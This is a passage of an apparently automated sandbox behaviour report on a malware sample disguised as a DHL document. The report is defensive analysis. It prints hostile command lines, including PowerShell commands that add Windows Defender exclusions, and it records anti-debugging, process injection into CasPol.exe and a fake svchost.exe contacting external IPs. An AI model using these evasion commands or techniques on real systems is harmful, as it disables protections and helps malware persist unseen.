          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E167C0 sgdt fword ptr [eax]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E15841 sidt fword ptr [ebp+esi*2-74AAFF1Dh]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E153E1 smsw word ptr [ecx+edi*4-1Dh]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5354
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1684
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 4096
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5281
          Source: C:\Windows\System32\svchost.exe TID: 5816Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5684Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: powershell.exe, 0000000A.00000003.494697592.0000000005AA7000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.538749877.0000000004D4D000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: svchost.exe, 00000004.00000002.527331789.00000194BB84A000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B-90E5-ECF4BB570DC9}
          Source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001A.00000002.511723717.0000000000928000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
          Source: explorer.exe, 00000010.00000002.508304531.0000000000A87000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}`
          Source: svchost.exe, 00000004.00000002.527821100.00000194BB860000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000001A.00000002.511723717.0000000000928000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000005.00000002.509681654.0000022579468000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.508922911.0000027B9CC29000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 0000000A.00000003.494697592.0000000005AA7000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.538749877.0000000004D4D000.00000004.00000001.sdmpBinary or memory string: {l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000010.00000002.508304531.0000000000A87000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\S
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D6998 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,069D706F,00000000,00000000
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess token adjusted: Debug
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeNetwork Connect: 104.21.71.230 80
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeNetwork Connect: 172.67.172.17 80
          Adds a directory exclusion to Windows DefenderShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 8BE008
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
          Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeQueries volume information: C:\Users\user\Desktop\DHL_document1102202068090891.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
